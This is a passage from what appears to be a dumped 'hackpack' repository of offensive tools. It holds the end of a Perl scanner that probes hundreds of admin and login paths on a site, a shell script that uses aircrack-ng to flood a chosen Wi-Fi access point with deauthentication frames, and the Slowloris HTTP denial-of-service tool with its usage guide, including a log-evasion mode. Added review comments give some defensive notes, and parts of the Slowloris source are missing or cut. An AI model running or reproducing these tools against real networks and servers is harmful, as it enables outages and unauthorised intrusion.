287 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.js','modelsearch/login.js','moderator.js','moderator/login.js',
288 | 'moderator/admin.js','account.js','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.js','admincontrol.js',
289 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.js','adminarea/index.html','adminarea/admin.html',
290 | 'webadmin.js','webadmin/index.js','acceso.js','webadmin/admin.js','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.js','moderator.html',
291 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
292 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
293 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.js','account.html','controlpanel.html','admincontrol.html',
294 | 'panel-administracion/login.js','wp-login.js','adminLogin.js','admin/adminLogin.js','home.js','admin.js','adminarea/index.js',
295 | 'adminarea/admin.js','adminarea/login.js','panel-administracion/index.js','panel-administracion/admin.js','modelsearch/index.js',
296 | 'modelsearch/admin.js','admincontrol/login.js','adm/admloginuser.js','admloginuser.js','admin2.js','admin2/login.js','admin2/index.js','usuarios/login.js',
297 | 'adm/index.js','adm.js','affiliate.js','adm_auth.js','memberadmin.js','administratorlogin.js'
298 | );
299 |
300 | foreach $ways(@path2){
301 |
# Plain concatenation: assumes $site already ends with '/' — TODO confirm where
# $site is built.
302 | $final=$site.$ways;
303 |
# A new LWP::UserAgent per request, 30 second timeout, no agent string set: the
# requests carry the library default (libwww-perl/<version>), which is easy to
# match in server logs or a WAF rule.
304 | my $req=HTTP::Request->new(GET=>$final);
305 | my $ua=LWP::UserAgent->new();
306 | $ua->timeout(30);
307 | my $response=$ua->request($req);
308 |
# "Found" depends only on case-sensitive keyword matches in the body; the HTTP
# status is never checked, so any page containing e.g. "password", "Personal" or
# "Sing" counts as a hit and results need manual confirmation. /Username/ is
# tested twice; the second test is redundant.
309 | if($response->content =~ /Username/ ||
310 | $response->content =~ /Password/ ||
311 | $response->content =~ /username/ ||
312 | $response->content =~ /password/ ||
313 | $response->content =~ /USERNAME/ ||
314 | $response->content =~ /PASSWORD/ ||
315 | $response->content =~ /Username/ ||
316 | $response->content =~ /Wachtwoord/ ||
317 | $response->content =~ /Senha/ ||
318 | $response->content =~ /senha/ ||
319 | $response->content =~ /Personal/ ||
320 | $response->content =~ /Usuario/ ||
321 | $response->content =~ /Clave/ ||
322 | $response->content =~ /Usager/ ||
323 | $response->content =~ /usager/ ||
324 | $response->content =~ /Sing/ ||
325 | $response->content =~ /passe/ ||
326 | $response->content =~ /P\/W/ ||
327 | $response->content =~ /Admin Password/
328 | ){
329 | print " \n [+] Found -> $final\n\n";
330 | }else{
# Every non-matching response lands here, whatever its status code.
331 | print "[-] Not Found <- $final\n";
332 | }
333 | }
334 | }
335 |
# Branch for $code "6": requests every candidate admin/login path below (directory
# names plus .cgi, .html and a few .asp pages) under $site and prints, per URL,
# whether the response body looks like a login form.
# NOTE(review): $site and $code are assigned outside this excerpt — presumably
# operator input; confirm how they are validated.
# Defender view: one GET per list entry from a single client; in access logs this
# is a dense burst of requests for admin-style paths.
336 | if($code eq "6"){
337 |
# Candidate relative paths. Some entries repeat (e.g. 'administrator/' and
# 'admin/account.cgi'), so those URLs are fetched more than once.
338 | @path2=('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
339 | 'memberadmin/','administratorlogin/','adm/','admin/account.cgi','admin/index.cgi','admin/login.cgi','admin/admin.cgi','admin/account.cgi',
340 | 'admin_area/admin.cgi','admin_area/login.cgi','siteadmin/login.cgi','siteadmin/index.cgi','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
341 | 'admin_area/index.cgi','bb-admin/index.cgi','bb-admin/login.cgi','bb-admin/admin.cgi','admin/home.cgi','admin_area/login.html','admin_area/index.html',
342 | 'admin/controlpanel.cgi','admin.cgi','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
343 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
344 | 'admin/cp.cgi','cp.cgi','administrator/index.cgi','administrator/login.cgi','nsw/admin/login.cgi','webadmin/login.cgi','admin/admin_login.cgi','admin_login.cgi',
345 | 'administrator/account.cgi','administrator.cgi','admin_area/admin.html','pages/admin/admin-login.cgi','admin/admin-login.cgi','admin-login.cgi',
346 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cgi','modelsearch/login.cgi','moderator.cgi','moderator/login.cgi',
347 | 'moderator/admin.cgi','account.cgi','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cgi','admincontrol.cgi',
348 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cgi','adminarea/index.html','adminarea/admin.html',
349 | 'webadmin.cgi','webadmin/index.cgi','acceso.cgi','webadmin/admin.cgi','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cgi','moderator.html',
350 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
351 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
352 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cgi','account.html','controlpanel.html','admincontrol.html',
353 | 'panel-administracion/login.cgi','wp-login.cgi','adminLogin.cgi','admin/adminLogin.cgi','home.cgi','admin.cgi','adminarea/index.cgi',
354 | 'adminarea/admin.cgi','adminarea/login.cgi','panel-administracion/index.cgi','panel-administracion/admin.cgi','modelsearch/index.cgi',
355 | 'modelsearch/admin.cgi','admincontrol/login.cgi','adm/admloginuser.cgi','admloginuser.cgi','admin2.cgi','admin2/login.cgi','admin2/index.cgi','usuarios/login.cgi',
356 | 'adm/index.cgi','adm.cgi','affiliate.cgi','adm_auth.cgi','memberadmin.cgi','administratorlogin.cgi'
357 | );
358 |
359 | foreach $ways(@path2){
360 |
# Plain concatenation: assumes $site already ends with '/' — TODO confirm where
# $site is built.
361 | $final=$site.$ways;
362 |
# A new LWP::UserAgent per request, 30 second timeout, no agent string set: the
# requests carry the library default (libwww-perl/<version>), which is easy to
# match in server logs or a WAF rule.
363 | my $req=HTTP::Request->new(GET=>$final);
364 | my $ua=LWP::UserAgent->new();
365 | $ua->timeout(30);
366 | my $response=$ua->request($req);
367 |
# "Found" depends only on case-sensitive keyword matches in the body; the HTTP
# status is never checked, so any page containing e.g. "password", "Personal" or
# "Sing" counts as a hit and results need manual confirmation. /Username/ is
# tested twice; the second test is redundant.
368 | if($response->content =~ /Username/ ||
369 | $response->content =~ /Password/ ||
370 | $response->content =~ /username/ ||
371 | $response->content =~ /password/ ||
372 | $response->content =~ /USERNAME/ ||
373 | $response->content =~ /PASSWORD/ ||
374 | $response->content =~ /Username/ ||
375 | $response->content =~ /Wachtwoord/ ||
376 | $response->content =~ /Senha/ ||
377 | $response->content =~ /senha/ ||
378 | $response->content =~ /Personal/ ||
379 | $response->content =~ /Usuario/ ||
380 | $response->content =~ /Clave/ ||
381 | $response->content =~ /Usager/ ||
382 | $response->content =~ /usager/ ||
383 | $response->content =~ /Sing/ ||
384 | $response->content =~ /passe/ ||
385 | $response->content =~ /P\/W/ ||
386 | $response->content =~ /Admin Password/
387 | ){
388 | print " \n [+] Found -> $final\n\n";
389 | }else{
# Every non-matching response lands here, whatever its status code.
390 | print "[-] Not Found <- $final\n";
391 | }
392 | }
393 | }
394 |
395 |
# Branch for $code "7": requests every candidate admin/login path below (directory
# names plus .brf, .html and a few .asp pages) under $site and prints, per URL,
# whether the response body looks like a login form.
# NOTE(review): $site and $code are assigned outside this excerpt — presumably
# operator input; confirm how they are validated.
# Defender view: one GET per list entry from a single client; in access logs this
# is a dense burst of requests for admin-style paths.
396 | if($code eq "7"){
397 |
# Candidate relative paths. Some entries repeat (e.g. 'administrator/' and
# 'admin/account.brf'), so those URLs are fetched more than once.
# NOTE(review): 'webadmin/login.brfbrf' in this list has a doubled extension,
# unlike every other entry — looks like a typo.
398 | @path2=('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
399 | 'memberadmin/','administratorlogin/','adm/','admin/account.brf','admin/index.brf','admin/login.brf','admin/admin.brf','admin/account.brf',
400 | 'admin_area/admin.brf','admin_area/login.brf','siteadmin/login.brf','siteadmin/index.brf','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
401 | 'admin_area/index.brf','bb-admin/index.brf','bb-admin/login.brf','bb-admin/admin.brf','admin/home.brf','admin_area/login.html','admin_area/index.html',
402 | 'admin/controlpanel.brf','admin.brf','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
403 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
404 | 'admin/cp.brf','cp.brf','administrator/index.brf','administrator/login.brf','nsw/admin/login.brf','webadmin/login.brfbrf','admin/admin_login.brf','admin_login.brf',
405 | 'administrator/account.brf','administrator.brf','acceso.brf','admin_area/admin.html','pages/admin/admin-login.brf','admin/admin-login.brf','admin-login.brf',
406 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.brf','modelsearch/login.brf','moderator.brf','moderator/login.brf',
407 | 'moderator/admin.brf','account.brf','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.brf','admincontrol.brf',
408 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.brf','adminarea/index.html','adminarea/admin.html',
409 | 'webadmin.brf','webadmin/index.brf','webadmin/admin.brf','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.brf','moderator.html',
410 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
411 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
412 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.brf','account.html','controlpanel.html','admincontrol.html',
413 | 'panel-administracion/login.brf','wp-login.brf','adminLogin.brf','admin/adminLogin.brf','home.brf','admin.brf','adminarea/index.brf',
414 | 'adminarea/admin.brf','adminarea/login.brf','panel-administracion/index.brf','panel-administracion/admin.brf','modelsearch/index.brf',
415 | 'modelsearch/admin.brf','admincontrol/login.brf','adm/admloginuser.brf','admloginuser.brf','admin2.brf','admin2/login.brf','admin2/index.brf','usuarios/login.brf',
416 | 'adm/index.brf','adm.brf','affiliate.brf','adm_auth.brf','memberadmin.brf','administratorlogin.brf'
417 | );
418 |
419 | foreach $ways(@path2){
420 |
# Plain concatenation: assumes $site already ends with '/' — TODO confirm where
# $site is built.
421 | $final=$site.$ways;
422 |
# A new LWP::UserAgent per request, 30 second timeout, no agent string set: the
# requests carry the library default (libwww-perl/<version>), which is easy to
# match in server logs or a WAF rule.
423 | my $req=HTTP::Request->new(GET=>$final);
424 | my $ua=LWP::UserAgent->new();
425 | $ua->timeout(30);
426 | my $response=$ua->request($req);
427 |
# "Found" depends only on case-sensitive keyword matches in the body; the HTTP
# status is never checked, so any page containing e.g. "password", "Personal" or
# "Sing" counts as a hit and results need manual confirmation. /Username/ is
# tested twice; the second test is redundant.
428 | if($response->content =~ /Username/ ||
429 | $response->content =~ /Password/ ||
430 | $response->content =~ /username/ ||
431 | $response->content =~ /password/ ||
432 | $response->content =~ /USERNAME/ ||
433 | $response->content =~ /PASSWORD/ ||
434 | $response->content =~ /Username/ ||
435 | $response->content =~ /Wachtwoord/ ||
436 | $response->content =~ /Senha/ ||
437 | $response->content =~ /senha/ ||
438 | $response->content =~ /Personal/ ||
439 | $response->content =~ /Usuario/ ||
440 | $response->content =~ /Clave/ ||
441 | $response->content =~ /Usager/ ||
442 | $response->content =~ /usager/ ||
443 | $response->content =~ /Sing/ ||
444 | $response->content =~ /passe/ ||
445 | $response->content =~ /P\/W/ ||
446 | $response->content =~ /Admin Password/
447 | ){
448 | print " \n [+] Found -> $final\n\n";
449 | }else{
# Every non-matching response lands here, whatever its status code.
450 | print "[-] Not Found <- $final\n";
451 | }
452 | }
453 | }
454 |
--------------------------------------------------------------------------------
/hackpack/hackpack/ddos/LRDoS.sh:
--------------------------------------------------------------------------------
# Interactive menu around the aircrack-ng tools. Option 1 starts monitor mode on
# an operator-chosen interface and randomises the MAC address of mon0; option 2
# shows an airodump-ng scan, reads a BSSID and runs aireplay-ng deauthentication
# against it until Enter is pressed; option 3 prints an "About" text.
# Defensive note: deauthentication frames are unauthenticated 802.11 management
# frames. Networks that require 802.11w Protected Management Frames (mandatory
# under WPA3) do not honour forged ones, and a wireless IDS can alert on a
# sustained stream of deauth frames naming one BSSID.
# NOTE(review): there is no shebang line and no privilege check; the tools
# called here presumably need root — confirm.
1 | clear
2 | echo "%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
3 | echo "% Local Router Denial Of Service %"
4 | echo "% By: R4V3N747700 - Top-Hat-Sec %"
5 | echo "% admin@top-hat-sec.com %"
6 | echo "% http://www.top-hat-sec.com %"
7 | echo "%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
8 | echo ""
9 | echo "1. Configure Interface"
10 | echo "2. Configure Target & Attack!"
11 | echo "3. About"
12 | echo ""
13 | echo "Choose Option: "
14 | read menu
15 |
# $menu is unquoted in every test below: an empty or multi-word answer makes
# each [ ... ] fail with an error, so control falls through to "Invalid Entry..".
16 | if [ $menu = "1" ]; then
17 | clear
18 | airmon-ng
19 | echo "Type the interface you wish to use: "
20 | read interface
# $interface is passed unquoted and unvalidated, so the typed value is
# word-split and glob-expanded before airmon-ng receives it.
21 | airmon-ng start $interface
22 | echo "Faking MAC"
23 | sleep 2
# mon0 is hard-coded: assumes airmon-ng named the monitor interface mon0 —
# TODO confirm for the aircrack-ng version in use.
24 | ifconfig mon0 down
25 | macchanger -r mon0
26 | ifconfig mon0 up
# Restarts the menu by running the script again as a child process through a
# relative path: this only works when the current directory contains LRDoS.sh,
# and every round trip nests one more shell.
27 | ./LRDoS.sh
28 | else
29 | if [ $menu = "2" ]; then
30 | clear
31 | xterm -T scanning -e airodump-ng mon0 &
32 | echo "Enter target BSSID: "
33 | read bssid
# killall stops every airodump-ng process on the host, not only the one
# started above.
34 | killall airodump-ng
35 | echo "Preforming Denial of Service"
# $bssid is unquoted and never checked to be a MAC address. Per the About text
# below, aireplay-ng is used here to send deauth packets without limit.
36 | xterm -T attacking -e aireplay-ng -0 0 -a $bssid mon0 &
37 | echo "The attack will last as long as you keep it running.."
38 | echo ""
39 | echo "When you wish to stop the attack, please press enter.."
40 | read enterkey
# Same caveat as above: this ends all aireplay-ng processes on the host.
41 | killall aireplay-ng
42 | ./LRDoS.sh
43 | else
44 | if [ $menu = "3" ]; then
45 | clear
# NOTE(review): deauthentication happens at the 802.11 layer and involves no IP
# address, so the "until your IP address is blocked" wording below does not
# describe an actual stopping condition.
46 | echo "%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
47 | echo "% This tool uses the aircrack-ng suite to send infinite deauth packets %"
48 | echo "% to the target Access Point. Since you do not need to authenticate %"
49 | echo "% with the AP, you can DoS the network until your IP address is blocked %"
50 | echo "% or you decide to stop the attack. As long as the attack is running, %"
51 | echo "% all machines and wireless devices will be kicked off of the target network %"
52 | echo "%=============================================================================%"
53 | echo "%Please Be Responsible - R4V3N747700 - admin@top-hat-sec.com %"
54 | echo "==============================================================================="
55 | echo ""
56 | echo "Press Enter to continue.."
# Unlike the other branches, this one does not restart the menu: the script
# ends after Enter is pressed.
57 | read entermenu
58 |
59 |
60 | else
61 | echo "Invalid Entry.."
62 | sleep 2
63 | ./LRDoS.sh
64 | fi
65 | fi
66 | fi
67 |
--------------------------------------------------------------------------------
/hackpack/hackpack/ddos/slowloris.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl -w
2 | use strict;
3 | use IO::Socket::INET;
4 | use IO::Socket::SSL;
5 | use Getopt::Long;
6 | use Config;
7 |
8 | $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
9 |
10 | print < \$shost,
45 | 'dns=s' => \$host,
46 | 'httpready' => \$httpready,
47 | 'num=i' => \$connections,
48 | 'cache' => \$cache,
49 | 'port=i' => \$port,
50 | 'https' => \$ssl,
51 | 'tcpto=i' => \$tcpto,
52 | 'test' => \$test,
53 | 'timeout=i' => \$timeout,
54 | 'version' => \$version,
55 | );
56 |
57 | if ($version) {
58 | print "Version 0.7\n";
59 | exit;
60 | }
61 |
62 | unless ($host) {
63 | print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
64 | print "\n\tType 'perldoc $0' for help with options.\n\n";
65 | exit;
66 | }
67 |
68 | unless ($port) {
69 | $port = 80;
70 | print "Defaulting to port 80.\n";
71 | }
72 |
73 | unless ($tcpto) {
74 | $tcpto = 5;
75 | print "Defaulting to a 5 second tcp connection timeout.\n";
76 | }
77 |
78 | unless ($test) {
79 | unless ($timeout) {
80 | $timeout = 100;
81 | print "Defaulting to a 100 second re-try timeout.\n";
82 | }
83 | unless ($connections) {
84 | $connections = 1000;
85 | print "Defaulting to 1000 connections.\n";
86 | }
87 | }
88 |
89 | my $usemultithreading = 0;
90 | if ( $Config{usethreads} ) {
91 | print "Multithreading enabled.\n";
92 | $usemultithreading = 1;
93 | use threads;
94 | use threads::shared;
95 | }
96 | else {
97 | print "No multithreading capabilites found!\n";
98 | print "Slowloris will be slower than normal as a result.\n";
99 | }
100 |
101 | my $packetcount : shared = 0;
102 | my $failed : shared = 0;
103 | my $connectioncount : shared = 0;
104 |
105 | srand() if ($cache);
106 |
107 | if ($shost) {
108 | $sendhost = $shost;
109 | }
110 | else {
111 | $sendhost = $host;
112 | }
113 | if ($httpready) {
114 | $method = "POST";
115 | }
116 | else {
117 | $method = "GET";
118 | }
119 |
120 | if ($test) {
121 | my @times = ( "2", "30", "90", "240", "500" );
122 | my $totaltime = 0;
123 | foreach (@times) {
124 | $totaltime = $totaltime + $_;
125 | }
126 | $totaltime = $totaltime / 60;
127 | print "This test could take up to $totaltime minutes.\n";
128 |
129 | my $delay = 0;
130 | my $working = 0;
131 | my $sock;
132 |
133 | if ($ssl) {
134 | if (
135 | $sock = new IO::Socket::SSL(
136 | PeerAddr => "$host",
137 | PeerPort => "$port",
138 | Timeout => "$tcpto",
139 | Proto => "tcp",
140 | )
141 | )
142 | {
143 | $working = 1;
144 | }
145 | }
146 | else {
147 | if (
148 | $sock = new IO::Socket::INET(
149 | PeerAddr => "$host",
150 | PeerPort => "$port",
151 | Timeout => "$tcpto",
152 | Proto => "tcp",
153 | )
154 | )
155 | {
156 | $working = 1;
157 | }
158 | }
159 | if ($working) {
160 | if ($cache) {
161 | $rand = "?" . int( rand(99999999999999) );
162 | }
163 | else {
164 | $rand = "";
165 | }
166 | my $primarypayload =
167 | "GET /$rand HTTP/1.1\r\n"
168 | . "Host: $sendhost\r\n"
169 | . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
170 | . "Content-Length: 42\r\n";
171 | if ( print $sock $primarypayload ) {
172 | print "Connection successful, now comes the waiting game...\n";
173 | }
174 | else {
175 | print
176 | "That's odd - I connected but couldn't send the data to $host:$port.\n";
177 | print "Is something wrong?\nDying.\n";
178 | exit;
179 | }
180 | }
181 | else {
182 | print "Uhm... I can't connect to $host:$port.\n";
183 | print "Is something wrong?\nDying.\n";
184 | exit;
185 | }
186 | for ( my $i = 0 ; $i <= $#times ; $i++ ) {
187 | print "Trying a $times[$i] second delay: \n";
188 | sleep( $times[$i] );
189 | if ( print $sock "X-a: b\r\n" ) {
190 | print "\tWorked.\n";
191 | $delay = $times[$i];
192 | }
193 | else {
194 | if ( $SIG{__WARN__} ) {
195 | $delay = $times[ $i - 1 ];
196 | last;
197 | }
198 | print "\tFailed after $times[$i] seconds.\n";
199 | }
200 | }
201 |
202 | if ( print $sock "Connection: Close\r\n\r\n" ) {
203 | print "Okay that's enough time. Slowloris closed the socket.\n";
204 | print "Use $delay seconds for -timeout.\n";
205 | exit;
206 | }
207 | else {
208 | print "Remote server closed socket.\n";
209 | print "Use $delay seconds for -timeout.\n";
210 | exit;
211 | }
212 | if ( $delay < 166 ) {
213 | print < "$host",
249 | PeerPort => "$port",
250 | Timeout => "$tcpto",
251 | Proto => "tcp",
252 | )
253 | )
254 | {
255 | $working[$z] = 1;
256 | }
257 | else {
258 | $working[$z] = 0;
259 | }
260 | }
261 | else {
262 | if (
263 | $sock[$z] = new IO::Socket::INET(
264 | PeerAddr => "$host",
265 | PeerPort => "$port",
266 | Timeout => "$tcpto",
267 | Proto => "tcp",
268 | )
269 | )
270 | {
271 | $working[$z] = 1;
272 | $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
273 | }
274 | else {
275 | $working[$z] = 0;
276 | }
277 | }
278 | if ( $working[$z] == 1 ) {
279 | if ($cache) {
280 | $rand = "?" . int( rand(99999999999999) );
281 | }
282 | else {
283 | $rand = "";
284 | }
285 | my $primarypayload =
286 | "$method /$rand HTTP/1.1\r\n"
287 | . "Host: $sendhost\r\n"
288 | . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
289 | . "Content-Length: 42\r\n";
290 | my $handle = $sock[$z];
291 | if ($handle) {
292 | print $handle "$primarypayload";
293 | if ( $SIG{__WARN__} ) {
294 | $working[$z] = 0;
295 | close $handle;
296 | $failed++;
297 | $failedconnections++;
298 | }
299 | else {
300 | $packetcount++;
301 | $working[$z] = 1;
302 | }
303 | }
304 | else {
305 | $working[$z] = 0;
306 | $failed++;
307 | $failedconnections++;
308 | }
309 | }
310 | else {
311 | $working[$z] = 0;
312 | $failed++;
313 | $failedconnections++;
314 | }
315 | }
316 | }
317 | print "\t\tSending data.\n";
318 | foreach my $z ( 1 .. $num ) {
319 | if ( $working[$z] == 1 ) {
320 | if ( $sock[$z] ) {
321 | my $handle = $sock[$z];
322 | if ( print $handle "X-a: b\r\n" ) {
323 | $working[$z] = 1;
324 | $packetcount++;
325 | }
326 | else {
327 | $working[$z] = 0;
328 | #debugging info
329 | $failed++;
330 | $failedconnections++;
331 | }
332 | }
333 | else {
334 | $working[$z] = 0;
335 | #debugging info
336 | $failed++;
337 | $failedconnections++;
338 | }
339 | }
340 | }
341 | print
342 | "Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
343 | sleep($timeout);
344 | }
345 | }
346 |
# domultithreading($num): starts one thread per block of 50 connections.
# Each thread runs doconnections(50, 1); $i advances by 50 per thread, so the
# handles are stored at indices 0, 50, 100, ... of @thrs and the remaining
# slots stay undefined.
# NOTE(review): @threadslist is captured once and never refreshed inside the
# wait loop, whose body only resets the shared $failed counter. As written the
# loop returns at once when zero or one thread is listed and otherwise spins
# without sleeping or joining.
347 | sub domultithreading {
348 | my ($num) = @_;
349 | my @thrs;
350 | my $i = 0;
351 | my $connectionsperthread = 50;
352 | while ( $i < $num ) {
353 | $thrs[$i] =
354 | threads->create( \&doconnections, $connectionsperthread, 1 );
355 | $i += $connectionsperthread;
356 | }
357 | my @threadslist = threads->list();
358 | while ( $#threadslist > 0 ) {
359 | $failed = 0;
360 | }
361 | }
362 |
363 | __END__
364 |
365 | =head1 TITLE
366 |
367 | Slowloris
368 |
369 | =head1 VERSION
370 |
371 | Version 0.7 Beta
372 |
373 | =head1 DATE
374 |
375 | 06/17/2009
376 |
377 | =head1 AUTHOR
378 |
379 | RSnake with threading from John Kinsella
380 |
381 | =head1 ABSTRACT
382 |
383 | Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.
384 |
385 | =head1 AFFECTS
386 |
387 | Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...?
388 |
389 | =head1 NOT AFFECTED
390 |
391 | IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?
392 |
393 | =head1 DESCRIPTION
394 |
395 | Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of its threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well.
396 |
397 | As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood.
398 |
399 | =head2 Testing
400 |
401 | If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:
402 |
403 | =head3 Testing Example:
404 |
405 | ./slowloris.pl -dns www.example.com -port 80 -test
406 |
407 | This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing).
408 |
409 | =head2 HTTP DoS
410 |
411 | Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the number of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though.
412 |
413 | =head3 HTTP DoS Example:
414 |
415 | ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
416 |
417 | =head2 HTTPReady Bypass
418 |
419 | HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST versus a GET or HEAD request with the -httpready switch.
420 |
421 | =head3 HTTPReady Bypass Example
422 |
423 | ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready
424 |
425 | =head2 Stealth Host DoS
426 |
427 | If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a separate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately.
428 |
429 | =head3 Stealth Host DoS Example:
430 |
431 | ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com
432 |
433 | =head2 HTTPS DoS
434 |
435 | Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary.
436 |
437 | =head3 HTTPS DoS Example:
438 |
439 | ./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
440 |
441 | =head2 HTTP Cache
442 |
443 | Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary.
444 |
445 | =head3 HTTP Cache Example:
446 |
447 | ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
448 |
449 | =head1 Issues
450 |
451 | Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through NetScaler devices, in its current incarnation. There may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distributed, although only NetScaler has been tested.
452 |
453 | Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it is unlikely to be noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture.
454 |
455 | For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD.
456 |
457 | Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to its logs with a lot of 400 (Bad Request) errors. So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too.
458 |
459 | =head1 What is a slow loris?
460 |
461 | What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out:
462 |
